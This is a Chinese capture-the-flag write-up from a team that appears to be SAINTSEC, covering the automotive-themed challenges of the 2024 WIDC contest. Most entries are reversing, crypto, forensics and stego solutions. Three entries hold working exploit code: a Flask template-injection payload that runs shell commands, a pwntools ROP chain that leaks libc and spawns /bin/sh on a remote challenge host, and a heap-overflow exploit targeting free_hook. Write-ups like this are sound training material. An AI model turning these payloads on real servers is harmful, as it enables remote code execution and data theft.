Day1-嵌入式程序简单逆向
逆向汇编代码得到加密逻辑为逐位将字符的ASCII码值加上3,再与9异或。将题目给的数据解base64后进行如上加密得到flag。
b64_decode_str = "lx9bma<lv]bc|azxeap:bv_k.l5:g;e9:g5g-ge:WnhNeGi=U6_-x]u^7XlpI;wZ^]"
flag = ""
for a in b64_decode_str:
flag += chr((ord(a) + 3) ^ 9)
print(flag)
#fr5lym6fpilovmtramz4lpkg8f14c7a54c1c9ca4SxbXaCeIQ0k9riqh3RfzE7sThi
Day1 -不安全的车企内网
登录时发现用户名会回显,响应头里面发现是flask,ssti,使用一下exp完成攻击
import requests
url = "http://172.10.0.21:8000/register"
payload = '''
{{lipsum.__globals__['os'].popen('cat ./flag/flag').read()}}
'''
print(requests.post(url, data={"user": payload}).text)
Day1-IVIServer
原题链接:
https://7ee1n.github.io/2021/11/07/BSidesAhmedabadCTF2021/
from pwn import *
context.log_level='debug'
context.binary=ELF('./server')
elf=ELF('./server')
libc=ELF('./libc-2.31.so')
SOCKFD = 4
def get(payload):
global p
p = remote('pwn.bsidesahmedabad.in', 9080)
py=flat({
0:b'GET /',
255: b'r',
0x138:[
payload
],
},filler=b'x00')
p.send(py+b'rn')
rop=ROP(elf)
rop.http_response(4,elf.got['write'])
get(rop.chain())
p.recvuntil(b'</html>nHTTP/1.1')
libcbase=u64(p.recvline().strip().ljust(8,b'x00'))- libc.symbols['write']
success(hex(libcbase))
libc.address=libcbase
rop = ROP(libc)
rop.dup2(SOCKFD, 0)
rop.dup2(SOCKFD, 1)
rop.dup2(SOCKFD, 2)
rop.system(next(libc.search(b'/bin/sh')))
get(rop.chain())
p.recvuntil(b'</html>n')
p.interactive()
Day1-车载通信协议
由1883端口判断是mqtt协议
存在匿名访问,使用mqtt-pwn工具连接,发现有名为flag的topic
用mqttfx客户端连接服务端,订阅flag主题,收到消息问想要什么
发布回答flag
收到消息,要玩猜数字游戏
二分法猜出数字后得到flag
Day2-车辆身份验证算法
from Crypto.Util.number import *
q = 31133702248881127631782881523509514476295949917122267121183371475000133184586174714396793644108294610935657329746903823657946536256899714076625760275173956706353888064555549064829709009640322743264038620966294636309911212621150898337629208482500384052935025619985047550270255090023343971256783414328092914248587672386617566422965425207785676797600936839556684715022346892107346366574407526099471338642307133437759220537846448437788211849588664491112404963383693116467782205041029098512207782583480993966604998421344660336431260561583879139849901548024253578304205860692342713953570388722937954933289936897205980716117
h = 7479856923878243888440888672844723062047571272556529760791388804749830947638106557467887553359594527284215983651237303197361839342245930727075103851252694200077479188468017448449313614412769738144700971711549137789290733004590838892989968103378686521773849802601405707815668581933555308957750986742176692804532749076668670300598708809281336336814136161669355533687195881130337149759522328766625901698480300656083599150462729901168306146171589266181628852056728470683680551973098848836293771016415271912573220080593590309888271888517605697277144430578513191280950815089968643259211353244436267567557456053045262878466
c = 429633025508597849623581682941413262998122137449005442145138470065847327103036727404626306379284511549714302199598866480970675273975210441015457022843111558443561825331941415126255871526201864795940071437602555024286559341823246182157480790439813986927891748029716157798569943993538191841077926115352987414280071817801043098050542082078666616788674806002113613279589438740909428444797915581688744647694596536620226032782501572321014769949362774191243994608572057792056353664666429685043726397327996076875440373242053749476708726634285972033216701275507339428064215442465140310384610569381749508378023099179079407328
A=matrix([[h,1],[q,0]])
lll=A.LLL()
g,f=lll[0]
g,f=abs(g),abs(f)
#print(g)
#print(f)
a=f*c%q
f_i=inverse_mod(f,g)
b=f_i*a %g
f=long_to_bytes(b)
print(f)
Day2-蛛丝马迹
内存取证,用volatility先scanfile找到flag.txt的位置,然后dump得到flag.txt
fn6ldn8kwak16bwg07abade65c253267OvAsF2gk8WPfyhTHKGxEV0BIpQX3DdRuroLlCq76jZJzYa4neat
Day2-车机堆溢出利用
from pwn import *
context.log_level = 'debug'
#p=process('./pwn')
p=remote('ip',port)
push = 0x2A3D
pop = 0xFFFF28
change2esp = -1
value2idx = 0x10101010
sub = 0x11111
div = 0x514
# system = 0x08051830
system = 0x08051c60
free_hook = 0x80e09f0
heap_off = (0x110-0x8)/4
def create(d):
return " ".join([str(x) for x in d])
payload = create([push,push,push,push,change2esp,push,sub,div,value2idx])
payload1 = create(['$0',system,4,heap_off,free_hook])
p.sendline(payload)
p.sendline(payload1)
p.interactive()
Day2-OTA升级解密(pyc)
pyc的header不对,几个大版本的魔数试出来3.8的能正常反编译:
然后pycdc反编译:
# Source Generated with Decompyle++
# File: 92BFABA74B71D8262D96EF9F046B8F1E.pyc (Python 3.8)
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64
def encrypt(plaintext, key, iv):
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), default_backend(), **('backend',))
padder = padding.PKCS7(128).padder()
padded_plaintext = padder.update(plaintext) + padder.finalize()
encryptor = cipher.encryptor()
ciphertext = encryptor.update(padded_plaintext) + encryptor.finalize()
return base64.b64encode(ciphertext).decode()
plaintext = 'flag'
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
ciphertext = encrypt(plaintext.encode(), key, iv)
print('密文:', ciphertext)
简单AES,写脚步得出flag:
import base64
from Crypto.Cipher import AES
ciphertext = 'XalqLcjPTIHqHSnybH24Vy5BfobRchwUlKZpkfOmBoniTrW7dKgdgKg3npyW0ENJgkVlbHjKDTvj0UfSX6agvAGFVlgNV/HE2BS0ELZIM+xE3lU5LNDehjjKeW+ZhZuZjEohAqCJBsHX2zKMrtLlIQ=='
key = b'asfdsf141fsad11f'
iv = b'MDEyMzQ1Njc4OWFi'
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(base64.b64decode(ciphertext))
flag = flag[:-flag[-1]] # unpad
print(flag)
# b'ff6jrwtydqnlkduhjg1ab9pxjv6cgb3da80c9dfb8d827YgQDvitKJT1yE3rqOB9klXf7zxcVmoHMPFeu5h0AsC2UbLSNI6Gpn4WdwRZ8jame'
Day2-硬件算法杂逆
foremost解包,解出来最后有五个文件,AES_encode是pyinstaller打包的文件,套路解包得出pyc:
$ python2 pyinstxtractor.py AES_encode
[+] Processing AES_encode
[+] Pyinstaller version: 2.1+
[+] Python version: 3.11
[+] Length of package: 8816359 bytes
[+] Found 40 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: AES_encode.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.11 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: AES_encode
You can now use a python decompiler on the pyc files within the extracted directory
因为3.11的pyc还没有支持的反编译工具,用pycdas分析出字节码再手撕:
AES_encode.pyc (Python 3.11)
[Code]
File Name: AES_encode.py
Object Name: <module>
Qualified Name: <module>
Arg Count: 0
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 6
Flags: 0x00000000
[Names]
'cryptography.hazmat.primitives.ciphers'
'Cipher'
'algorithms'
'modes'
'cryptography.hazmat.backends'
'default_backend'
'cryptography.hazmat.primitives'
'padding'
'simon_encode'
'encrypt_all'
'simon_decrypt'
'simon_decrypt_all'
'os'
'generate_key'
'aes_encrypt'
'key'
'open'
'file'
'read'
'strip'
'hex_key'
'encode'
'byte_key'
'plaintext'
'iv'
'ciphertext'
'print'
[Locals+Names]
[Constants]
0
(
'Cipher'
'algorithms'
'modes'
)
(
'default_backend'
)
(
'padding'
)
(
'encrypt_all'
)
(
'simon_decrypt_all'
)
None
[Code]
File Name: AES_encode.py
Object Name: generate_key
Qualified Name: generate_key
Arg Count: 0
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 4
Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
[Names]
'to_bytes'
[Locals+Names]
'original_hex'
[Constants]
None
0x3836353635367830L
32
'big'
(
'byteorder'
)
[Disassembly]
0 RESUME 0
2 LOAD_CONST 1: 0x3836353635367830L
4 STORE_FAST 0: original_hex
6 LOAD_FAST 0: original_hex
8 LOAD_METHOD 0: to_bytes
30 LOAD_CONST 2: 32
32 LOAD_CONST 3: 'big'
34 KW_NAMES 4
36 PRECALL 2
40 CALL 2
50 POP_TOP
52 LOAD_FAST 0: original_hex
54 LOAD_METHOD 0: to_bytes
76 LOAD_CONST 2: 32
78 LOAD_CONST 3: 'big'
80 KW_NAMES 4
82 PRECALL 2
86 CALL 2
96 RETURN_VALUE
[Code]
File Name: AES_encode.py
Object Name: aes_encrypt
Qualified Name: aes_encrypt
Arg Count: 2
Pos Only Arg Count: 0
KW Only Arg Count: 0
Stack Size: 6
Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
[Names]
'os'
'urandom'
'Cipher'
'algorithms'
'AES'
'modes'
'CBC'
'default_backend'
'encryptor'
'padding'
'PKCS7'
'padder'
'update'
'finalize'
[Locals+Names]
'plaintext'
'key'
'iv'
'cipher'
'encryptor'
'padder'
'padded_plaintext'
'ciphertext'
[Constants]
None
16
(
'backend'
)
128
[Disassembly]
0 RESUME 0
2 LOAD_GLOBAL 1: NULL + os
14 LOAD_ATTR 1: urandom
24 LOAD_CONST 1: 16
26 PRECALL 1
30 CALL 1
40 STORE_FAST 2: iv
42 LOAD_GLOBAL 5: NULL + Cipher
54 LOAD_GLOBAL 7: NULL + algorithms
66 LOAD_ATTR 4: AES
76 LOAD_FAST 1: key
78 PRECALL 1
82 CALL 1
92 LOAD_GLOBAL 11: NULL + modes
104 LOAD_ATTR 6: CBC
114 LOAD_FAST 2: iv
116 PRECALL 1
120 CALL 1
130 LOAD_GLOBAL 15: NULL + default_backend
142 PRECALL 0
146 CALL 0
156 KW_NAMES 2
158 PRECALL 3
162 CALL 3
172 STORE_FAST 3: cipher
174 LOAD_FAST 3: cipher
176 LOAD_METHOD 8: encryptor
198 PRECALL 0
202 CALL 0
212 STORE_FAST 4: encryptor
214 LOAD_GLOBAL 19: NULL + padding
226 LOAD_ATTR 10: PKCS7
236 LOAD_CONST 3: 128
238 PRECALL 1
242 CALL 1
252 LOAD_METHOD 11: padder
274 PRECALL 0
278 CALL 0
288 STORE_FAST 5: padder
290 LOAD_FAST 5: padder
292 LOAD_METHOD 12: update
314 LOAD_FAST 0: plaintext
316 PRECALL 1
320 CALL 1
330 LOAD_FAST 5: padder
332 LOAD_METHOD 13: finalize
354 PRECALL 0
358 CALL 0
368 BINARY_OP 0 (+)
372 STORE_FAST 6: padded_plaintext
374 LOAD_FAST 4: encryptor
376 LOAD_METHOD 12: update
398 LOAD_FAST 6: padded_plaintext
400 PRECALL 1
404 CALL 1
414 LOAD_FAST 4: encryptor
416 LOAD_METHOD 13: finalize
438 PRECALL 0
442 CALL 0
452 BINARY_OP 0 (+)
456 STORE_FAST 7: ciphertext
458 LOAD_FAST 2: iv
460 LOAD_FAST 7: ciphertext
462 BUILD_TUPLE 2
464 RETURN_VALUE
'flag.txt'
'r'
'cipflag:'
'randomiv:'
[Disassembly]
0 RESUME 0
2 LOAD_CONST 0: 0
4 LOAD_CONST 1: ('Cipher', 'algorithms', 'modes')
6 IMPORT_NAME 0: cryptography.hazmat.primitives.ciphers
8 IMPORT_FROM 1: Cipher
10 STORE_NAME 1: Cipher
12 IMPORT_FROM 2: algorithms
14 STORE_NAME 2: algorithms
16 IMPORT_FROM 3: modes
18 STORE_NAME 3: modes
20 POP_TOP
22 LOAD_CONST 0: 0
24 LOAD_CONST 2: ('default_backend',)
26 IMPORT_NAME 4: cryptography.hazmat.backends
28 IMPORT_FROM 5: default_backend
30 STORE_NAME 5: default_backend
32 POP_TOP
34 LOAD_CONST 0: 0
36 LOAD_CONST 3: ('padding',)
38 IMPORT_NAME 6: cryptography.hazmat.primitives
40 IMPORT_FROM 7: padding
42 STORE_NAME 7: padding
44 POP_TOP
46 LOAD_CONST 0: 0
48 LOAD_CONST 4: ('encrypt_all',)
50 IMPORT_NAME 8: simon_encode
52 IMPORT_FROM 9: encrypt_all
54 STORE_NAME 9: encrypt_all
56 POP_TOP
58 LOAD_CONST 0: 0
60 LOAD_CONST 5: ('simon_decrypt_all',)
62 IMPORT_NAME 10: simon_decrypt
64 IMPORT_FROM 11: simon_decrypt_all
66 STORE_NAME 11: simon_decrypt_all
68 POP_TOP
70 LOAD_CONST 0: 0
72 LOAD_CONST 6: None
74 IMPORT_NAME 12: os
76 STORE_NAME 12: os
78 LOAD_CONST 7: <CODE> generate_key
80 MAKE_FUNCTION 0
82 STORE_NAME 13: generate_key
84 LOAD_CONST 8: <CODE> aes_encrypt
86 MAKE_FUNCTION 0
88 STORE_NAME 14: aes_encrypt
90 PUSH_NULL
92 LOAD_NAME 13: generate_key
94 PRECALL 0
98 CALL 0
108 STORE_NAME 15: key
110 PUSH_NULL
112 LOAD_NAME 16: open
114 LOAD_CONST 9: 'flag.txt'
116 LOAD_CONST 10: 'r'
118 PRECALL 2
122 CALL 2
132 BEFORE_WITH
134 STORE_NAME 17: file
136 LOAD_NAME 17: file
138 LOAD_METHOD 18: read
160 PRECALL 0
164 CALL 0
174 LOAD_METHOD 19: strip
196 PRECALL 0
200 CALL 0
210 STORE_NAME 20: hex_key
212 LOAD_CONST 6: None
214 LOAD_CONST 6: None
216 LOAD_CONST 6: None
218 PRECALL 2
222 CALL 2
232 POP_TOP
234 JUMP_FORWARD 11 (to 258)
236 PUSH_EXC_INFO
238 WITH_EXCEPT_START
240 POP_JUMP_FORWARD_IF_TRUE 4
242 RERAISE 2
244 COPY 3
246 POP_EXCEPT
248 RERAISE 1
250 POP_TOP
252 POP_EXCEPT
254 POP_TOP
256 POP_TOP
258 LOAD_NAME 20: hex_key
260 LOAD_METHOD 21: encode
282 PRECALL 0
286 CALL 0
296 STORE_NAME 22: byte_key
298 LOAD_NAME 22: byte_key
300 STORE_NAME 23: plaintext
302 PUSH_NULL
304 LOAD_NAME 14: aes_encrypt
306 LOAD_NAME 23: plaintext
308 LOAD_NAME 15: key
310 PRECALL 2
314 CALL 2
324 UNPACK_SEQUENCE 2
328 STORE_NAME 24: iv
330 STORE_NAME 25: ciphertext
332 PUSH_NULL
334 LOAD_NAME 26: print
336 LOAD_CONST 11: 'cipflag:'
338 LOAD_NAME 25: ciphertext
340 FORMAT_VALUE 0
342 BUILD_STRING 2
344 PRECALL 1
348 CALL 1
358 POP_TOP
360 PUSH_NULL
362 LOAD_NAME 26: print
364 LOAD_CONST 12: 'randomiv:'
366 LOAD_NAME 24: iv
368 FORMAT_VALUE 0
370 BUILD_STRING 2
372 PRECALL 1
376 CALL 1
386 POP_TOP
388 LOAD_CONST 6: None
390 RETURN_VALUE
就是个AES解密,密文和iv都在flag里,在这里面找到key就行,写脚本:
from Crypto.Cipher import AES
key = 0x3836353635367830.to_bytes(32, byteorder='big')
aes = AES.new(key, AES.MODE_CBC, b'xddx92xd2x1axb8xe2<Hxb7xfaNx94xc8x1a$xb3')
flag = aes.decrypt(b'xebxb1J:}xb6xadSx89x86xabxe7x9bsxd5xebyxf2xdexd2nxf9xa3xa8Gkxb2$BEx03x9fxa1xf7xa9x19x85Sxa8Yxe2Vx98x8dx1eux84xbd`-xcaxd4xc3Em\xd1xa1xf7i6xcbx0cx842txccx94xe6x94xeeAxb4Hxd32hxf5x13K')
print(flag)
# fplkvjfixpal7zc8h0agc93ea464d53ec012poaSm0ZUeWT16JEctXsnjdQNYyhello
Day2-汽车算法逆向解密
题目描述说了AES,密文、key和iv都给了,直接写脚本解:
import base64
from Crypto.Cipher import AES
ciphertext = base64.b64decode('w61n0tWJKuyNjBN7rX8Bx/X2hcgpYCwhmCvaYSy3Omqk1Uj1RH9NtYi66amBTQm9f9hziWC0N5wLzRkGylIWbxOv0bLOwuqmXY2TigRyzWw=')
key = base64.b64decode('7TapLcNbP8TqDWzwJElihy0TAFL/JCk7QZKtcuUKIvE=')
iv = base64.b64decode('Y64sxLZOyy0BSdBXsbzE/g==')
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(ciphertext)
print(flag)
# fvoelrnobjmfz1aknof7u24gfe5204521be119b3vOh9bsAqHGRlyXio6M0xtkEZ21nUmhelp
Day2-debug 算法逆向
密文在sec.txt里,计算flag的方法在native层的getFlag函数中
密文也是在运行时写入的:
密文长度56,在getFlag函数中可以知道是做了凯撒移位3+xor3的操作:
写脚本解密:
buf = b"jm0g3{djyalj{4og3k1vequwbi:f61:6f;36:;2dkkfAWRjSv2UFDukk"
flag = []
for x in buf:
x ^= 3
flag.append(x)
print(bytes(flag))
凯撒上dcode:
fk0a7udfwylfu4ia7e9rcosqxg6b2962b572658deebYQNfMr8SBDsee
Day2 - 车机的图片
后缀为apk的文件末尾有一张图片的base64:
提取出来fix即可:
Day2-安全驾驶的秘密
zsteg直接得到
fdnef8gmlmj476wye0uaw1g5ad0dc6fb6bb3fc6FQAnjXIzoykL37aUltxbdN4Ye05s6THvMggo
Day2-汽车身份验证
反编译发现aes密文,跟进找到key
解密获得flag :fhol9vnxra362og8be02e6880be34cb5cmxZWQrDBTkv7ijgabPEOJN9wKRfloor
Day2-一叶障目
zip方式打开docx看到flag
原文始发于微信公众号(SAINTSEC):2024WIDC WriteUp by SAINTSEC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论